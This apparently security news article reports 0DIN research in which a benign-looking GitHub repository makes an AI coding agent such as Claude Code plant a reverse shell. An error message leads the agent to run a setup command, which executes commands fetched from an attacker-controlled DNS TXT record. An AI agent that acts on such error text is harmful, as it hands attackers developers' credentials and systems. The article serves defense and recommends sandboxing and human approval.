The Repository That Looks Completely Normal
Researchers at Mozilla's Zero Day Investigative Network, the GenAI bug-bounty program known as 0DIN, have published a technique that should unsettle every engineering organization handing repositories to AI coding agents. The attack uses a GitHub repository that contains no exploit code, no obviously malicious command, and nothing a security scanner or a careful human reviewer would flag. The setup instructions look ordinary: a standard pip install, a routine initialization command. And yet, when an AI coding agent is told to clone and set up the project, it can end up planting an interactive reverse shell on the developer's machine.
The reason this works is that the malice is not in the repository. It is in the chain of innocuous events the agent triggers while trying to be helpful. 0DIN summarized the compromise as happening with no exploit code, no warning, and no suspicious command anyone had to approve. The repository is bait, and the AI agent's own eagerness to resolve errors is the exploit. That makes this fundamentally different from a poisoned package or a planted backdoor. There is nothing to scan because the dangerous behavior is assembled at runtime from individually harmless parts.
Three Steps of Indirection
The chain unfolds in stages. The repository ships a Python package designed to refuse execution until specific initialization steps are completed. When the agent runs the project, that package throws an error instructing the user to run a setup command, in the demonstration python3 -m axiom init. The AI agent reads the error, interprets it as a normal setup hiccup, and automatically runs the suggested command as part of its error-recovery routine. That command executes a shell script which fetches a configuration value from a DNS TXT record controlled by the attacker, and executes the returned content as commands.
As the 0DIN researchers put it, the reverse shell is three indirection steps away from anything the agent actually evaluated: an error message it trusted, a script that fetched a value, and a DNS record it never saw. Their summary of the Claude Code demonstration is the line that should be pinned to every AI engineering team's wall. As the researchers wrote, Claude Code never decided to open a shell. It decided to fix an error. The reverse shell is three indirection steps away from anything Claude Code actually evaluated.
Why DNS Is the Perfect Courier
The choice to stage the payload in a DNS TXT record is what makes this difficult to catch and easy to operate. DNS lookups are ubiquitous, expected, and rarely inspected at the content level. A shell script reaching out to resolve a TXT record does not trip the alarms that an outbound HTTP request to a suspicious domain might, and the attacker can rotate the payload simply by editing a DNS record without ever touching the repository again. The repository stays clean and reviewable forever while the actual instructions live somewhere no static analysis tool is looking.
The end state is severe. If the chain completes, the attacker gains an interactive shell running with the developer's privileges. That means access to environment variables, API keys, cloud credentials, local configuration files, and anything else the developer's session can reach. In a modern engineering setup, a developer workstation is often a gateway to production secrets, internal package registries, and CI systems. A reverse shell there is not a contained nuisance. It is a foothold into the software supply chain itself.
This Is Not Just a Claude Code Problem
0DIN demonstrated the technique against Claude Code, but the behavior it abuses is not unique to one product. Cursor, GitHub Copilot's agent mode, and the broader category of agentic coding tools all share the same helpful reflex: when a command fails with an error that suggests a fix, the agent runs the fix. That design choice is what makes these tools feel magical, and it is exactly the property the attack weaponizes. Any agent that automatically executes remediation steps based on error output is potentially vulnerable to the same indirection chain.
We have argued before that the security model for AI agents cannot rest on the agent recognizing malice, because the whole attack design is to ensure there is no single malicious step to recognize. This research is the clearest proof yet. The defense has to live in the environment, not the model. Running untrusted repositories inside disposable sandboxes with no network egress and no access to real credentials neutralizes the entire chain, because a reverse shell into an empty container reaches nothing worth stealing.
The Trust Boundary Has Moved
For CISOs and engineering leaders, the takeaway is a shift in where the trust boundary sits. For years the rule was simple: review the code before you run it. AI coding agents have quietly dissolved that boundary by running code on the developer's behalf, often before a human has read a single line. The agent becomes a confused deputy, executing actions the developer never explicitly authorized because the developer authorized the agent. When that deputy will run any command an error message suggests, the act of cloning a repository becomes the act of trusting its author with shell access.
None of this argues for abandoning agentic coding tools, which deliver real productivity gains that teams are not going to give back. It argues for treating agent execution with the same rigor we already apply to running untrusted binaries. Sandbox the agent's workspace, strip its credentials, cut its network egress, and require human approval for shell commands that escape the project directory. The convenience of an agent that fixes its own errors is genuine. So is the cost when an attacker writes the error.



